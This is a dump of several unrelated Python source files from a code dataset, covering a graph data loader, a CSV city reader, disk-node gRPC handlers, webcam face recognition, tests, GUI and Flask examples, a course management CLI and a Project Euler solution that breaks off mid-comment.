df.report_used.mean()\r\n","sub_path":"api/pandas/tongji.py","file_name":"tongji.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"628885507","text":"import numpy as np\nfrom torch.utils.data import Dataset\nfrom torch.utils.data.dataloader import DataLoader\nimport random\nfrom utility.dao_helper import Graph\nimport pandas as pd\n\n\nclass GraphData(object):\n\n def __init__(self, src_idx_list, dst_idx_list, ts_list, e_type_list, label_list):\n self.src_idx_list = src_idx_list\n self.dst_idx_list = dst_idx_list\n self.ts_list = ts_list\n self.e_type_list = e_type_list\n self.label_list = label_list\n self.rand_sampler = RandEdgeSampler(src_idx_list, dst_idx_list)\n\n\nclass RandEdgeSampler(object):\n def __init__(self, src_list, dst_list):\n self.src_list = np.unique(src_list)\n self.dst_list = np.unique(dst_list)\n\n def sample(self, size):\n src_index = np.random.randint(0, len(self.src_list), size)\n dst_index = np.random.randint(0, len(self.dst_list), size)\n return self.src_list[src_index], self.dst_list[dst_index]\n\n\nclass FeatureGen():\n\n def __init__(self, uniform=True, device=\"cpu\"):\n self.uniform = uniform\n self.device = device\n self.num_nodes = None\n self.num_relations = None\n pass\n\n def prepare_loader(self, g_df, batch_size, valid_batch_size):\n\n train_graph_data, val_graph_data, test_graph_data, new_node_val_graph_data, \\\n new_node_test_graph_data, train_graph, full_graph = self.split_data(g_df)\n\n train_dataset = TGATDataset(train_graph_data, train_graph, mode=\"train\", device=self.device)\n val_dataset = TGATDataset(val_graph_data, full_graph, mode=\"valid\", device=self.device)\n nn_val_dataset = TGATDataset(new_node_val_graph_data, full_graph, mode=\"valid_new_node\", device=self.device)\n\n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, collate_fn=train_dataset.collate_fn)\n val_dataloader = DataLoader(val_dataset, batch_size=valid_batch_size, collate_fn=val_dataset.collate_fn)\n nn_val_dataloader = DataLoader(nn_val_dataset, batch_size=valid_batch_size, collate_fn=nn_val_dataset.collate_fn)\n\n return train_dataloader, val_dataloader, nn_val_dataloader\n\n def split_data(self, g_df):\n\n val_time, test_time = list(np.quantile(g_df.timestamp, [0.70, 0.85]))\n\n src_idx_list = g_df.srcId.values\n dst_idx_list = g_df.dstId.values\n e_type_list = g_df.eType.values\n label_list = g_df.label.values\n ts_list = g_df.timestamp.values\n\n total_node_set = set(np.unique(np.hstack([g_df.srcId.values, g_df.dstId.values])))\n self.num_relations = len(set(e_type_list))\n\n max_idx = max(src_idx_list.max(), dst_idx_list.max())\n self.num_nodes = max_idx+1\n\n # random selected 10% of nodes from the validation+test sets\n mask_node_set = set(\n random.sample(set(src_idx_list[ts_list > val_time]).union(set(dst_idx_list[ts_list > val_time])),\n int(0.1 * self.num_nodes)))\n mask_src_flag = g_df.srcId.map(lambda x: x in mask_node_set).values\n mask_dst_flag = g_df.dstId.map(lambda x: x in mask_node_set).values\n none_new_node_flag = (1 - mask_src_flag) * (1 - mask_dst_flag) # 两边都不包含new node set\n\n train_flag = (ts_list <= val_time) * (none_new_node_flag > 0)\n\n train_src_list = src_idx_list[train_flag]\n train_dst_list = dst_idx_list[train_flag]\n train_ts_list = ts_list[train_flag]\n train_e_type_list = e_type_list[train_flag]\n train_label_list = label_list[train_flag]\n train_graph_data = GraphData(train_src_list, train_dst_list, train_ts_list, train_e_type_list, train_label_list)\n\n # define the new nodes sets for testing inductiveness of the model\n train_node_set = set(train_src_list).union(train_dst_list)\n assert (len(train_node_set - mask_node_set) == len(train_node_set))\n new_node_set = total_node_set - train_node_set\n\n # select validation and test dataset\n val_flag = (ts_list <= test_time) * (ts_list > val_time)\n test_flag = ts_list > test_time\n\n is_new_node_edge = np.array([(a in new_node_set 
or b in new_node_set) for a, b in zip(src_idx_list, dst_idx_list)])\n new_node_val_flag = val_flag * is_new_node_edge\n new_node_test_flag = test_flag * is_new_node_edge\n\n # validation and test with all edges\n val_src_list = src_idx_list[val_flag]\n val_dst_list = dst_idx_list[val_flag]\n val_ts_list = ts_list[val_flag]\n val_e_type_list = e_type_list[val_flag]\n val_label_list = label_list[val_flag]\n val_graph_data = GraphData(val_src_list, val_dst_list, val_ts_list, val_e_type_list, val_label_list)\n\n test_src_list = src_idx_list[test_flag]\n test_dst_list = dst_idx_list[test_flag]\n test_ts_list = ts_list[test_flag]\n test_e_type_list = e_type_list[test_flag]\n test_label_list = label_list[test_flag]\n test_graph_data = GraphData(test_src_list, test_dst_list, test_ts_list, test_e_type_list, test_label_list)\n\n # validation and test with edges that at least has one new node (not in training set)\n new_node_val_src_list = src_idx_list[new_node_val_flag]\n new_node_val_dst_list = dst_idx_list[new_node_val_flag]\n new_node_val_ts_list = ts_list[new_node_val_flag]\n new_node_val_e_type_list = e_type_list[new_node_val_flag]\n new_node_val_label_list = label_list[new_node_val_flag]\n new_node_val_graph_data = GraphData(new_node_val_src_list, new_node_val_dst_list, new_node_val_ts_list, new_node_val_e_type_list, new_node_val_label_list)\n\n new_node_test_src_list = src_idx_list[new_node_test_flag]\n new_node_test_dst_list = dst_idx_list[new_node_test_flag]\n new_node_test_ts_list = ts_list[new_node_test_flag]\n new_node_test_e_type_list = e_type_list[new_node_test_flag]\n new_node_test_label_list = label_list[new_node_test_flag]\n new_node_test_graph_data = GraphData(new_node_test_src_list, new_node_test_dst_list, new_node_test_ts_list, new_node_test_e_type_list, new_node_test_label_list)\n\n train_kg = pd.DataFrame({\"h\":train_graph_data.src_idx_list, \"t\":train_graph_data.dst_idx_list, \"r\":train_graph_data.e_type_list, \"timestamp\":train_graph_data.ts_list})\n train_graph = Graph(train_kg, fan_outs=[15, 15], device=self.device)\n\n # full graph with all the data for the test and validation purpose\n full_kg = pd.DataFrame({\"h\":src_idx_list, \"t\":dst_idx_list, \"r\":e_type_list, \"timestamp\":ts_list})\n full_graph = Graph(full_kg, fan_outs=[15, 15], device=self.device)\n\n return train_graph_data, val_graph_data, test_graph_data, new_node_val_graph_data, \\\n new_node_test_graph_data, train_graph, full_graph\n\n\nclass TGATDataset(Dataset):\n\n def __init__(self, graph_data, graph, mode=\"train\", device=\"cpu\"):\n super().__init__()\n self.mode = mode\n self.device = device\n self.src_idx_list = graph_data.src_idx_list\n self.dst_idx_list = graph_data.dst_idx_list\n self.ts_list = graph_data.ts_list\n self.label_list = graph_data.label_list\n self.rand_sampler = graph_data.rand_sampler\n self.ngh_finder = graph\n\n def __getitem__(self, index):\n src_l_cut, dst_l_cut = self.src_idx_list[index], self.dst_idx_list[index]\n ts_l_cut = self.ts_list[index]\n label_l_cut = self.label_list[index]\n return src_l_cut, dst_l_cut, ts_l_cut, label_l_cut\n\n def collate_fn(self, batch):\n src_list, dst_list, ts_list, label_list = zip(*batch)\n src_list_fake, dst_list_fake = self.rand_sampler.sample(len(src_list))\n return np.array(src_list), np.array(dst_list), np.array(ts_list), \\\n np.array(src_list_fake), np.array(dst_list_fake)\n\n def __len__(self):\n return 
len(self.src_idx_list)","sub_path":"dao/tgat_data_loader_dgl.py","file_name":"tgat_data_loader_dgl.py","file_ext":"py","file_size_in_byte":7881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455592702","text":"import unittest\n# found this playlist useful for this and python in general: https://www.youtube.com/watch?v=YYXdXT2l-Gg&list=PL-osiE80TeTskrapNbzXhwoFUiLCjGgY7\n# and this videos in particular was good: https://www.youtube.com/watch?v=q5uM4VKywbA\nimport csv # this is to read in the csv file\n\n# Create a class to hold a city location. Call the class \"City\". It should have\n# fields for name, latitude, and longitude.\n\n\n# City class with name, lat and lon fields to hold the city name the latitude and the longditude\nclass City:\n def __init__(self, name, lat, lon):\n self.name = name\n self.lat = lat\n self.lon = lon\n\n\n# We have a collection of US cities with population over 750,000 stored in the\n# file \"cities.csv\". (CSV stands for \"comma-separated values\".)\n#\n# Use Python's built-in \"csv\" module to read this file so that each record is\n# imported into a City instance. (You're free to add more attributes to the City\n# class if you wish, but this is not necessary.) Google \"python 3 csv\" for\n# references and use your Google-fu for other examples.\n#\n# Store the instances in the \"cities\" list, below.\n#\n# Note that the first line of the CSV is header that describes the fields--this\n# should not be loaded into a City object.\n\ncities = []\n\n# opening the ciyies.csv file and reading in the data to a list\n# found this useful when thinking about this: https://www.youtube.com/watch?v=q5uM4VKywbA\n\nwith open('cities.csv') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n next(reader)\n for row in reader:\n cities.append(City(row[0], row[3], row[4]))\n\n# Print the list of cities (name, lat, lon), 1 record per line.\n\n# for in loop printing cities (name, lat, lon), 1 record per line\nfor city in cities:\n print(\"{}, {}, {}\".format(city.name, city.lat, city.lon))\n\n# *** STRETCH GOAL! ***\n#\n# Allow the user to input two points, each specified by latitude and longitude.\n# These points form the corners of a lat/lon square. Output the cities that fall\n# within this square.\n#\n# Be aware that the user could specify either a lower-left/upper-right pair of\n# coordinates, or an upper-left/lower-right pair of coordinates. 
Hint: normalize\n# the input data so that it's always one or the other (what is latMin, latMax?)\n# then search for cities.\n#\n# Example I/O:\n#\n# Enter lat1,lon1: 45,-100\n# Enter lat2,lon2: 32,-120\n# Albuquerque: (35.1055,-106.6476)\n# Riverside: (33.9382,-117.3949)\n# San Diego: (32.8312,-117.1225)\n# Los Angeles: (34.114,-118.4068)\n# Las Vegas: (36.2288,-115.2603)\n# Denver: (39.7621,-104.8759)\n# Phoenix: (33.5722,-112.0891)\n# Tucson: (32.1558,-110.8777)\n# Salt Lake City: (40.7774,-111.9301)\n\n# create a list of the first coordinate set using the list constructor and mapping over the input casting the input to float\nlatlon1 = list(map(float, input(\"Enter lat1,lon1: \").strip().split(\",\")))\n\n# create a list of the second coordinate set using the list constructor and mapping over the input casting the input to float\nlatlon2 = list(map(float, input(\"Enter lat2,lon2: \").strip().split(\",\")))\n\n# use sorted() for normalization normalize the lats and the lons\nlats = sorted([latlon1[0], latlon2[0]])\nlons = sorted([latlon1[1], latlon2[1]])\n\n# set the data using a list comprehension outputting the result to the console\n[print(\"{}: ({},{})\\n\".format(c.name, c.lat, c.lon)) for c in cities if lats[0] <= float(\n c.lat) <= lats[1] and lons[0] <= float(c.lon) <= lons[1]]\n\n### STRETCH COMPLETE ###\n","sub_path":"GIT-USERS/TOM2/Sprint-Challenge--Intro-Python/src/cityreader.py","file_name":"cityreader.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"470561071","text":"import uuid\n\nfrom vda.common.constant import Constant\nfrom vda.grpc import portal_pb2\nfrom vda.common.modules import DiskNode\nfrom vda.common.syncup import syncup_dn, SyncupCtx\n\n\ndef create_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn_id = uuid.uuid4().hex\n dn_name = request.dn_name\n\n dn = DiskNode(\n dn_id=dn_id,\n dn_name=dn_name,\n dn_listener_conf=request.dn_listener_conf,\n online=request.online,\n location=request.location,\n hash_code=request.hash_code,\n version=0,\n error=True,\n error_msg=Constant.UNINIT_MSG,\n )\n session.add(dn)\n session.commit()\n\n syncup_ctx = SyncupCtx(session=session, req_id=req_id)\n syncup_dn(dn.dn_id, syncup_ctx)\n\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n return portal_pb2.CreateDnReply(reply_info=reply_info)\n\n\ndef delete_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn = session \\\n .query(DiskNode) \\\n .filter_by(dn_name=request.dn_name) \\\n .with_lockmode(\"update\") \\\n .one()\n session.delete(dn)\n session.commit()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n return portal_pb2.DeleteDnReply(reply_info=reply_info)\n\n\ndef modify_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn = session \\\n .query(DiskNode) \\\n .filter_by(dn_name=request.dn_name) \\\n .with_lockmode(\"update\") \\\n .one()\n attr = request.WhichOneof(\"attr\")\n if attr == \"new_online\":\n dn.online = request.new_online\n elif attr == \"new_hash_code\":\n dn.hash_code = request.new_hash_code\n else:\n assert(False)\n session.add(dn)\n session.commit()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n return portal_pb2.ModifyDnReply(reply_info=reply_info)\n\n\ndef 
list_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n query = session.query(DiskNode)\n if request.offset:\n query = query.offset(request.offset)\n if request.limit:\n query = query.limit(request.limit)\n if request.set_online:\n query = query.filter_by(online=request.online)\n if request.set_location:\n query = query.filter_by(location=request.location)\n if request.set_hash_code:\n query = query.filter_by(hash_code=request.hash_code)\n if request.set_error:\n query = query.filter_by(error=request.error)\n dns = query.all()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n dn_msg_list = []\n for dn in dns:\n dn_msg = portal_pb2.DnMsg(\n dn_id=dn.dn_id,\n dn_name=dn.dn_name,\n dn_listener_conf=dn.dn_listener_conf,\n online=dn.online,\n location=dn.location,\n hash_code=dn.hash_code,\n version=dn.version,\n error=dn.error,\n error_msg=dn.error_msg,\n )\n dn_msg_list.append(dn_msg)\n return portal_pb2.ListDnReply(\n reply_info=reply_info, dn_msg_list=dn_msg_list)\n\n\ndef get_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn = session \\\n .query(DiskNode) \\\n .filter_by(dn_name=request.dn_name) \\\n .one()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n dn_msg = portal_pb2.DnMsg(\n dn_id=dn.dn_id,\n dn_name=dn.dn_name,\n dn_listener_conf=dn.dn_listener_conf,\n online=dn.online,\n location=dn.location,\n hash_code=dn.hash_code,\n version=dn.version,\n error=dn.error,\n error_msg=dn.error_msg,\n )\n pd_name_list = []\n for pd in dn.pds:\n pd_name_list.append(pd.pd_name)\n return portal_pb2.GetDnReply(\n reply_info=reply_info,\n dn_msg=dn_msg,\n pd_name_list=pd_name_list,\n )\n","sub_path":"vda/portal/disk_node.py","file_name":"disk_node.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"534710731","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: abhilash\n\"\"\"\n\n# importing the required libraries\nimport cv2\nimport face_recognition\nfrom flask import Flask\n\n#convert to web app\napp = Flask(__name__)\n\n\n# capture the video from default camera\nwebcam_video_stream = cv2.VideoCapture(0)\n\n#sapue edit\nsapue_image = face_recognition.load_image_file('ImagesAttendance/Sapue.jpg')\nsapue_face_encodings = face_recognition.face_encodings(sapue_image)[0]\n\nknown_face_encodings = [sapue_face_encodings]\nknown_face_name = [\"Sapuan\"]\n\n\n\n# initialize the array variable to hold all face locations in the frame\n#sapeu edit\nall_face_locations = []\nall_face_encodings = []\nall_face_names = []\n\n\n# loop through every frame in the video\nwhile True:\n # get the current frame from the video stream as an image\n ret, current_frame = webcam_video_stream.read()\n # resize the current frame to 1/4 size to proces faster\n current_frame_small = cv2.resize(current_frame, (0, 0), fx=0.25, fy=0.25)\n # detect all faces in the image\n # arguments are image,no_of_times_to_upsample, model\n all_face_locations = face_recognition.face_locations(current_frame_small, number_of_times_to_upsample=1,\n model='hog')\n\n #sapue edit\n\n all_face_encodings = face_recognition.face_encodings(current_frame_small, all_face_locations)\n print('There are {} no of the faces in this image'.format(len(all_face_locations)))\n\n # looping through the face locations and the face embeddings\n for current_face_location, 
current_face_encoding in zip(all_face_locations, all_face_encodings):\n # splitting the tuple to get the four position values of current face\n top_pos, right_pos, bottom_pos, left_pos = current_face_location\n top_pos = top_pos * 4\n right_pos = right_pos * 4\n bottom_pos = bottom_pos * 4\n left_pos = left_pos * 4\n\n # find all the matches and get the list of matches\n all_matches = face_recognition.compare_faces(known_face_encodings, current_face_encoding)\n\n # string to hold the label\n name_of_person = 'Unknown face'\n\n # check if the all_matches have at least one item\n # if yes, get the index number of face that is located in the first index of all_matches\n # get the name corresponding to the index number and save it in name_of_person\n if True in all_matches:\n first_match_index = all_matches.index(True)\n name_of_person = known_face_name[first_match_index]\n\n # draw rectangle around the face\n cv2.rectangle(current_frame, (left_pos, top_pos), (right_pos, bottom_pos), (255, 0, 0), 2)\n\n # display the name as text in the image\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(current_frame, name_of_person, (left_pos, bottom_pos), font, 0.5, (255, 255, 255), 1)\n\n # display the image\n cv2.imshow(\"Webcam Video\", current_frame)\n\n cv2.waitKey(1)\n\n\n\n\nwebcam_video_stream.release()\ncv2.destroyAllWindows()\n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"125753787","text":"\n\nfrom xai.brain.wordbase.verbs._shamble import _SHAMBLE\n\n#calss header\nclass _SHAMBLING(_SHAMBLE, ):\n\tdef __init__(self,): \n\t\t_SHAMBLE.__init__(self)\n\t\tself.name = \"SHAMBLING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"shamble\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_shambling.py","file_name":"_shambling.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"517003332","text":"from _wagyu import Box\nfrom hypothesis import given\n\nfrom tests.utils import (equivalence,\n implication)\nfrom . 
import strategies\n\n\n@given(strategies.boxes)\ndef test_reflexivity(box: Box) -> None:\n    assert box == box\n\n\n@given(strategies.boxes, strategies.boxes)\ndef test_symmetry(first_box: Box,\n                  second_box: Box) -> None:\n    assert equivalence(first_box == second_box,\n                       second_box == first_box)\n\n\n@given(strategies.boxes, strategies.boxes,\n       strategies.boxes)\ndef test_transitivity(first_box: Box,\n                      second_box: Box,\n                      third_box: Box) -> None:\n    assert implication(first_box == second_box\n                       and second_box == third_box,\n                       first_box == third_box)\n\n\n@given(strategies.boxes, strategies.boxes)\ndef test_connection_with_inequality(first_box: Box,\n                                    second_box: Box) -> None:\n    assert equivalence(not first_box == second_box,\n                       first_box != second_box)\n","sub_path":"tests/binding_tests/box_tests/test_equals.py","file_name":"test_equals.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"26090157","text":"\"\"\"\nSTEP 1.5: Restructure the data\n\"\"\"\n\nimport json\nimport re\n\ndata = None\nwith open('../etape_1/hom.od_eng.json', 'r') as f:\n    data = json.load(f)\n\n# Retrieve the important pieces of information\ntitle = data.get('TEI.2', {}).get('teiHeader', {}).get(\n    'fileDesc', {}).get('titleStmt', {}).get('title')\n\nauthor = data.get('TEI.2', {}).get('teiHeader', {}).get(\n    'fileDesc', {}).get('titleStmt', {}).get('author')\n\ndiv = data.get('TEI.2', {}).get('text', {}).get(\n    'body', {}).get('div1')\n\n# Export the restructured data\nwith open('./restructured_data.json', 'w') as f:\n    json.dump({\n        \"titre\": title,\n        \"auteur\": author,\n        \"donnees_textuelles\": [{\n            \"n\": text_data.get(\"@n\"),\n            \"texte\": re.sub(r\"–\", \"-\", text_data.get(\"p\"))\n        } for text_data in div]\n    }, f)\n","sub_path":"etape_2/restructure.py","file_name":"restructure.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181571641","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom PySide import QtGui\n\n\nclass MainWindow(QtGui.QWidget):\n\n    def __init__(self, parent=None):\n        QtGui.QWidget.__init__(self, parent)\n\n        ui_hello_lbl = QtGui.QLabel('Hello, World!')\n        ui_quit_btn = QtGui.QPushButton('Close Window')\n\n        ui_quit_btn.released.connect(self.close)\n\n        ui_vert_layout = QtGui.QVBoxLayout()\n        ui_vert_layout.addStretch(1)\n        ui_vert_layout.addWidget(ui_hello_lbl)\n        ui_vert_layout.addWidget(ui_quit_btn)\n        ui_vert_layout.addStretch(1)\n\n        ui_main_layout = QtGui.QHBoxLayout()\n        ui_main_layout.addStretch(1)\n        ui_main_layout.addLayout(ui_vert_layout)\n        ui_main_layout.addStretch(1)\n\n        ui_quit_btn.setFocus()\n\n        self.setLayout(ui_main_layout)\n        self.setWindowTitle('Hello World Executable')\n\n\nif __name__ == '__main__':\n    import sys\n\n    app = QtGui.QApplication([])\n    root = MainWindow()\n    root.show()\n\n    sys.exit(app.exec_())","sub_path":"python/qthelloworld.pyw","file_name":"qthelloworld.pyw","file_ext":"pyw","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"646178504","text":"import os\nimport sys\nimport pickle\nBasepath=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(Basepath)\nfrom conf import setting\nfrom lib import class_all\nfrom src import school_management\n\n\n\ndef pkl_load(pkl_path):\n    with open(pkl_path, 'rb') as file:\n        course = pickle.load(file)\n    return course\n\ndef to_school(num,dict,file):\n    pkl_course_path = setting.COURSEDB_PATH + '\\\\' + file\n    course = pkl_load(pkl_course_path)\n    course.course_append(dict[num].split('.')[0])\n    course.save()\n    pkl_school_path = setting.SCHOOLDB_PATH + '\\\\' + dict[num]\n    school = pkl_load(pkl_school_path)\n    school.course_append(file.split('.')[0])\n    school.save()\n\n\n\ndef course_dic():\n    '''List of course objects'''\n    course_dict = {}\n    for i,v in enumerate(os.listdir(setting.COURSEDB_PATH),1):\n        course_dict[str(i)]=v\n        print('%s.%s'%(i,v.split('.')[0]))\n    return course_dict\n\ndef course_query():\n    '''Browse courses'''\n    tag = True\n    while tag:\n        course_dict = course_dic()\n        cn_input = input('Enter the number of the course to look up (press q to quit): ').strip()\n        if cn_input.isdigit() and cn_input in course_dict.keys():\n            pkl_path = setting.COURSEDB_PATH + '\\\\' + course_dict[cn_input]\n            with open(pkl_path, 'rb') as file:\n                course = pickle.load(file)\n            '''\n\n\n\n            TODO: functionality to be completed\n\n\n\n            '''\n            print(course.info)\n        elif cn_input.upper() == 'Q':\n            tag = False\n        else:\n            print('Please enter a valid value')\n            continue\ndef course_create():\n    '''Create a course'''\n    tag=True\n    while tag:\n        cmd_input = input('Create a new course? (yes/no)').strip().upper()\n        if cmd_input == 'YES':\n            while tag:\n                course_name = input('Enter the course name: ').strip()\n                if not course_name:continue\n                course_price = input('Enter the course price: ').strip()\n                if not course_price:continue\n                course_period = input('Enter the course duration: ').strip()\n                if not course_period:continue\n                if not (course_name >= u'\\u4e00' and course_name <= u'\\u9fa5') and not course_name.isdigit():\n                    if course_price.isdigit() and course_period.isdigit():\n                        course=class_all.Course(course_name,course_price,course_period)\n                        print('%s course created successfully...' %(course.name.title()))\n                        course.save()\n                        print(course.info)\n                        print('')\n                        tag = False\n                    else:\n                        print('Invalid format for course price or course duration')\n                        continue\n                    # while tag:\n                    #     yes_no = input('Link a teacher? (yes/no)').strip()\n                    #     if yes_no.upper() == 'YES':\n                    #         course_teacher=input('Enter the teacher name: ').strip().title()\n                    #         teacher_list=os.listdir(setting.TEACHERDB_PATH)\n                    #         if teacher_list and course_teacher+'.pkl' in teacher_list:\n                    #             '''================'''\n                    #             print('guanlian')\n                    #             tag=False\n                    #             '''================'''\n                    #         else:\n                    #             print('Teacher not found, cannot link')\n                    #             tag=False\n                    #     elif yes_no.upper() == 'NO':\n                    #         tag=False\n                    #     else:\n                    #         continue\n                    tag=True\n                    while tag:\n                        yes_no = input('Link a school? (yes/no)').strip()\n                        if yes_no.upper() == 'YES':\n                            school_dict = school_management.school_dic()\n                            course_pkl = course_name + '.pkl'\n                            sn_input = input('Enter the number of the school to link (press q to quit): ').strip()\n                            to_school(sn_input, school_dict, course_pkl)\n                            tag=False\n                        elif yes_no.upper() == 'NO':\n                            tag=False\n                        else:\n                            continue\n                else:\n                    print('Invalid course name format')\n        elif cmd_input == 'NO':\n            print(\"Exit\")\n            tag=False\n        else:\n            print('Please enter a valid option')\ndef course_delete():\n    '''Delete a course. Known flaw: data in the linked objects' lists is not updated'''\n    tag = True\n    while tag:\n        course_dict = course_dic()\n        if course_dict:\n            cn_input = input('Enter the number of the course to delete (press q to quit): ').strip()\n            if cn_input.isdigit():\n                os.remove(setting.COURSEDB_PATH+'\\\\'+course_dict[cn_input])\n                course_dict.pop(cn_input)\n            elif cn_input.upper() == 'Q':\n                tag = False\n            else:\n                continue\n        else:\n            print('There are no courses yet')\n            tag=False\ndef course_to_teacher():\n    pass\ndef course_to_student():\n    pass\ndef course_to_school():\n    '''Link a course to a school'''\n    tag = True\n    while tag:\n        course_dict = course_dic()\n        if course_dict:\n            cn_input = input('Enter the number of the course to link to a school (press q to quit): ').strip()\n            if cn_input.isdigit() and cn_input in course_dict.keys():\n                school_dict=school_management.school_dic()\n            elif cn_input.upper() == 'Q':\n                tag = False\n                continue\n            else:\n                continue\n            sn_input = input('Enter the number of the school to link (press q to quit): ').strip()\n            if sn_input.isdigit() and sn_input in school_dict.keys():\n                to_school(sn_input, school_dict, course_dict[cn_input])\n                tag = False\n            elif sn_input.upper() == 'Q':\n                tag = False\n                continue\n        else:\n            print('There are no courses yet')\n            tag=False\ndef course_init():\n    '''Course initialization'''\n    if not os.listdir(setting.COURSEDB_PATH):\n        print('No courses have been created yet')\n        course_create()\ndef course_func_dic():\n    course_func_dict = {}\n    print('======Stay-at-Home University campus management======')\n    print('%s.Browse courses' % ('1'))\n    course_func_dict['1'] = course_query\n    print('%s.Create course' % ('2'))\n    course_func_dict['2'] = course_create\n    print('%s.Delete course' % ('3'))\n    course_func_dict['3'] = course_delete\n    print('%s.Link teacher' % ('4'))\n    course_func_dict['4'] = course_to_teacher\n    print('%s.Link student' % ('5'))\n    course_func_dict['5'] = course_to_student\n    print('%s.Link school' % ('6'))\n    course_func_dict['6'] = course_to_school\n    print('%s.Exit' % ('7'))\n    return course_func_dict\n\ndef course_man():\n    '''Campus management'''\n    while True:\n        course_func=course_func_dic()\n        cmd_input=input('Enter a function code (1-7): ').strip()\n        if cmd_input.isdigit() and cmd_input in course_func.keys():\n            course_func[cmd_input]()\n        elif cmd_input == '7':\n            break\n        print('')\n\n\nif __name__ == '__main__':\n    def run():\n        course_init()\n        course_man()\n    run()\n","sub_path":"D20170707ChoseCourseHomeWork/cll选课系统/src/course_management.py","file_name":"course_management.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378394890","text":"from flask import Blueprint, redirect, render_template, request, url_for\nfrom flask_login import current_user\n\nfrom dawdle.components.contact.forms import ContactForm\nfrom dawdle.components.contact.utils import send_contact_emails\n\ncontact_bp = Blueprint('contact', __name__, url_prefix='/contact')\n\n\n@contact_bp.route('/')\ndef index_GET():\n    return render_template(\n        'contact/index.html',\n        form=ContactForm(request.form, obj=current_user),\n    )\n\n\n@contact_bp.route('/', methods=['POST'])\ndef index_POST():\n    form = ContactForm(request.form, obj=current_user)\n\n    if not form.validate_on_submit():\n        return render_template('contact/index.html', form=form), 400\n\n    sent_email = send_contact_emails(\n        email=form.email.data,\n        subject=form.subject.data,\n        message=form.message.data,\n    )\n\n    if not sent_email:\n        return render_template('contact/index.html', form=form), 500\n\n    return redirect(url_for('contact.index_GET'))\n","sub_path":"legacy/dawdle/components/contact/blueprints.py","file_name":"blueprints.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"268701065","text":"\n# project euler\n# problem 92\n# Square digit chains\n\nmem = [0 for i in range(1000)]\nsq = [i**2 for i in range(10)]\nsolution = [None for i in range(1000)]\nlim = 1000\n\ndef sq_sum(n):\n    sum = 0\n    while n != 0:\n        sum += (sq[n%10])\n        n//=10\n\n    return sum\n\ndef check(n):\n    global solution\n    global mem\n    global lim\n    if n>=lim:\n        n = sq_sum(n)\n\n    if n == 89:\n        return True\n    elif n == 1:\n        return False\n\n    if solution[n] is None:\n        solution[n] = check(sq_sum(n))\n        return solution[n]\n    else:\n        return solution[n]\n\n# def check(n):\n#     global lim\n#     l = [n]\n#     succ = False\n    \n#     if n >= lim:\n#         n = sq_sum(n)\n#         l.append(n)\n\n#     while n is not 89 and n is not 1:\n    \n#         if solution[n] is not None:\n#             succ = solution[n]\n#             break\n#         if mem[n] is 0:\n#             mem[n] = sq_sum(n)\n#         n = mem[n]\n\n#         l.append(n)\n#             
